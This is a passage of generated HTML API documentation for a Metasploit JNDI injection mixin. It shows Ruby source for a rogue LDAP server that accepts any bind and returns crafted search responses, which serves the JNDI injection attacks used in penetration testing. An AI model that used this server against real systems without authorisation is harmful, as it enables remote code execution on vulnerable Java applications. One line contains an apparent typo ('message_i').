<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>ldap://</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Socket</span><span class='period'>.</span><span class='id identifier rubyid_to_authority'>to_authority</span><span class='lparen'>(</span><span class='id identifier rubyid_srvhost_addr'>srvhost_addr</span><span class='comma'>,</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SRVPORT</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>/</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_resource'>resource</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="on_dispatch_request-instance_method">
#<strong>on_dispatch_request</strong>(client, data) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>LDAP service callbacks</p>
<p>Handle incoming requests via service mixin</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/jndi_injection.rb', line 45</span>
<span class='kw'>def</span> <span class='id identifier rubyid_on_dispatch_request'>on_dispatch_request</span><span class='lparen'>(</span><span class='id identifier rubyid_client'>client</span><span class='comma'>,</span> <span class='id identifier rubyid_data'>data</span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>if</span> <span class='id identifier rubyid_data'>data</span><span class='period'>.</span><span class='id identifier rubyid_strip'>strip</span><span class='period'>.</span><span class='id identifier rubyid_empty?'>empty?</span>
<span class='id identifier rubyid_data'>data</span><span class='period'>.</span><span class='id identifier rubyid_extend'>extend</span><span class='lparen'>(</span><span class='const'>Net</span><span class='op'>::</span><span class='const'>BER</span><span class='op'>::</span><span class='const'>Extensions</span><span class='op'>::</span><span class='const'>String</span><span class='rparen'>)</span>
<span class='kw'>begin</span>
<span class='id identifier rubyid_pdu'>pdu</span> <span class='op'>=</span> <span class='const'>Net</span><span class='op'>::</span><span class='const'>LDAP</span><span class='op'>::</span><span class='const'>PDU</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='id identifier rubyid_data'>data</span><span class='period'>.</span><span class='id identifier rubyid_read_ber!'>read_ber!</span><span class='lparen'>(</span><span class='const'>Net</span><span class='op'>::</span><span class='const'>LDAP</span><span class='op'>::</span><span class='const'>AsnSyntax</span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>LDAP request data remaining: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_data'>data</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span> <span class='kw'>unless</span> <span class='id identifier rubyid_data'>data</span><span class='period'>.</span><span class='id identifier rubyid_empty?'>empty?</span>
<span class='id identifier rubyid_resp'>resp</span> <span class='op'>=</span> <span class='kw'>case</span> <span class='id identifier rubyid_pdu'>pdu</span><span class='period'>.</span><span class='id identifier rubyid_app_tag'>app_tag</span>
<span class='kw'>when</span> <span class='const'>Net</span><span class='op'>::</span><span class='const'>LDAP</span><span class='op'>::</span><span class='const'>PDU</span><span class='op'>::</span><span class='const'>BindRequest</span> <span class='comment'># bind request
</span> <span class='id identifier rubyid_client'>client</span><span class='period'>.</span><span class='id identifier rubyid_authenticated'>authenticated</span> <span class='op'>=</span> <span class='kw'>true</span>
<span class='id identifier rubyid_service'>service</span><span class='period'>.</span><span class='id identifier rubyid_encode_ldap_response'>encode_ldap_response</span><span class='lparen'>(</span>
<span class='id identifier rubyid_pdu'>pdu</span><span class='period'>.</span><span class='id identifier rubyid_message_id'>message_id</span><span class='comma'>,</span>
<span class='const'>Net</span><span class='op'>::</span><span class='const'>LDAP</span><span class='op'>::</span><span class='const'>ResultCodeSuccess</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='const'>Net</span><span class='op'>::</span><span class='const'>LDAP</span><span class='op'>::</span><span class='const'>PDU</span><span class='op'>::</span><span class='const'>BindResult</span>
<span class='rparen'>)</span>
<span class='kw'>when</span> <span class='const'>Net</span><span class='op'>::</span><span class='const'>LDAP</span><span class='op'>::</span><span class='const'>PDU</span><span class='op'>::</span><span class='const'>SearchRequest</span> <span class='comment'># search request
</span> <span class='kw'>if</span> <span class='id identifier rubyid_client'>client</span><span class='period'>.</span><span class='id identifier rubyid_authenticated'>authenticated</span> <span class='op'>||</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>LDAP_AUTH_BYPASS</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_client'>client</span><span class='period'>.</span><span class='id identifier rubyid_write'>write</span><span class='lparen'>(</span><span class='id identifier rubyid_build_ldap_search_response'>build_ldap_search_response</span><span class='lparen'>(</span><span class='id identifier rubyid_pdu'>pdu</span><span class='period'>.</span><span class='id identifier rubyid_message_id'>message_id</span><span class='comma'>,</span> <span class='id identifier rubyid_pdu'>pdu</span><span class='period'>.</span><span class='id identifier rubyid_search_parameters'>search_parameters</span><span class='lbracket'>[</span><span class='symbol'>:base_object</span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_service'>service</span><span class='period'>.</span><span class='id identifier rubyid_encode_ldap_response'>encode_ldap_response</span><span class='lparen'>(</span><span class='id identifier rubyid_pdu'>pdu</span><span class='period'>.</span><span class='id identifier rubyid_message_id'>message_id</span><span class='comma'>,</span> <span class='const'>Net</span><span class='op'>::</span><span class='const'>LDAP</span><span class='op'>::</span><span class='const'>ResultCodeSuccess</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Search success</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='const'>Net</span><span class='op'>::</span><span class='const'>LDAP</span><span class='op'>::</span><span class='const'>PDU</span><span class='op'>::</span><span class='const'>SearchResult</span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_service'>service</span><span class='period'>.</span><span class='id identifier rubyid_encode_ldap_response'>encode_ldap_response</span><span class='lparen'>(</span><span class='id identifier rubyid_pdu'>pdu</span><span class='period'>.</span><span class='id identifier rubyid_message_i'>message_i</span><span class='comma'>,</span> <span class='int'>50</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Not authenticated</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='const'>Net</span><span class='op'>::</span><span class='const'>LDAP</span><span class='op'>::</span><span class='const'>PDU</span><span class='op'>::</span><span class='const'>SearchResult</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>when</span> <span class='const'>Net</span><span class='op'>::</span><span class='const'>LDAP</span><span class='op'>::</span><span class='const'>PDU</span><span class='op'>::</span><span class='const'>UnbindRequest</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Client sent unbind request</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>nil</span> <span class='comment'># close client, no response can be sent over unbound comm
</span> <span class='kw'>else</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Client sent unexpected request </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_pdu'>pdu</span><span class='period'>.</span><span class='id identifier rubyid_app_tag'>app_tag</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>nil</span> <span class='comment'># close client, can&#39;t handle the unknown
</span> <span class='kw'>end</span>
<span class='id identifier rubyid_resp'>resp</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span> <span class='op'>?</span> <span class='id identifier rubyid_client'>client</span><span class='period'>.</span><span class='id identifier rubyid_close'>close</span> <span class='op'>:</span> <span class='id identifier rubyid_on_send_response'>on_send_response</span><span class='lparen'>(</span><span class='id identifier rubyid_client'>client</span><span class='comma'>,</span> <span class='id identifier rubyid_resp'>resp</span><span class='rparen'>)</span>
<span class='kw'>rescue</span> <span class='const'>StandardError</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_e'>e</span>
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Failed to handle LDAP request due to </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_e'>e</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_client'>client</span><span class='period'>.</span><span class='id identifier rubyid_close'>close</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_resp'>resp</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="validate_configuration!-instance_method">
#<strong>validate_configuration!</strong> &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
142
143</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/jndi_injection.rb', line 142</span>
<span class='kw'>def</span> <span class='id identifier rubyid_validate_configuration!'>validate_configuration!</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
<div id="footer">
Generated on Fri May 8 17:02:13 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink